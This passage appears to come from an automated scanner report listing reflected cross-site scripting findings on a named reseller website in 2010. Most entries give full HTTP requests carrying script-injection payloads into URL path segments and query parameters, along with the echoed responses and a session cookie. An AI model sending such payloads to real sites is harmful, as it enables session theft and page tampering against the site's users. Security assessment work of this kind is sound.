<p>The requested URL /resources-information/ebooks/themes/kosmosc094a<script>alert(1)</script>fd13b75a08a/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4009. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db2e5<script>alert(1)</script>ca94d9cc0fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/imagesdb2e5<script>alert(1)</script>ca94d9cc0fe/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/imagesdb2e5<script>alert(1)</script>ca94d9cc0fe/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4010. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d16ec<script>alert(1)</script>d57fa2b3c5f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/ratingd16ec<script>alert(1)</script>d57fa2b3c5f/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/ratingd16ec<script>alert(1)</script>d57fa2b3c5f/4half.gif was not found on this server.</p>
...[SNIP]...

2.4011. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7057a<script>alert(1)</script>93b295f1ece was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/4half.gif7057a<script>alert(1)</script>93b295f1ece HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/4half.gif7057a<script>alert(1)</script>93b295f1ece was not found on this server.</p>
...[SNIP]...

2.4012. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f140<script>alert(1)</script>89356ad7cdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/4half.gif?7f140<script>alert(1)</script>89356ad7cdc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/4half.gif?7f140<script>alert(1)</script>89356ad7cdc=1 was not found on this server.</p>
...[SNIP]...

2.4013. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1808<script>alert(1)</script>c1888063f0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationb1808<script>alert(1)</script>c1888063f0a/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationb1808<script>alert(1)</script>c1888063f0a/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4014. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0e41<script>alert(1)</script>d9fd59a983 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksa0e41<script>alert(1)</script>d9fd59a983/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksa0e41<script>alert(1)</script>d9fd59a983/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4015. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a8f01<script>alert(1)</script>a493ecdd58b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesa8f01<script>alert(1)</script>a493ecdd58b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesa8f01<script>alert(1)</script>a493ecdd58b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4016. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d0471<script>alert(1)</script>3d0669e0de5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmosd0471<script>alert(1)</script>3d0669e0de5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmosd0471<script>alert(1)</script>3d0669e0de5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4017. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 520b9<script>alert(1)</script>5d2993d278a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images520b9<script>alert(1)</script>5d2993d278a/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images520b9<script>alert(1)</script>5d2993d278a/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4018. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a159c<script>alert(1)</script>3bae12882b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/ratinga159c<script>alert(1)</script>3bae12882b8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/ratinga159c<script>alert(1)</script>3bae12882b8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4019. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7954f<script>alert(1)</script>2165647ab22 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php7954f<script>alert(1)</script>2165647ab22?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php7954f<script>alert(1)</script>2165647ab22?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4020. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9d63e<a>4e65cd53ad5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9d63e<a>4e65cd53ad5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9d63e<a>4e65cd53ad5&opt=2 was not found on this server.</p>
...[SNIP]...

2.4021. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ac593<a>f0748f13680 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...ac593<a>f0748f13680&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...ac593<a>f0748f13680&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4022. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63679<script>alert(1)</script>ba775e69840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&63679<script>alert(1)</script>ba775e69840=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&63679<script>alert(1)</script>ba775e69840=1 was not found on this server.</p>
...[SNIP]...

2.4023. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6be11<a>006b8eb45ba was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=26be11<a>006b8eb45ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=26be11<a>006b8eb45ba was not found on this server.</p>
...[SNIP]...

2.4024. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23b74<script>alert(1)</script>100e5eee6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information23b74<script>alert(1)</script>100e5eee6be/ebooks/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information23b74<script>alert(1)</script>100e5eee6be/ebooks/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4025. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b97ac<script>alert(1)</script>5aed20c613e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksb97ac<script>alert(1)</script>5aed20c613e/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksb97ac<script>alert(1)</script>5aed20c613e/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4026. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6aa43<script>alert(1)</script>78be1019b22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes6aa43<script>alert(1)</script>78be1019b22/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
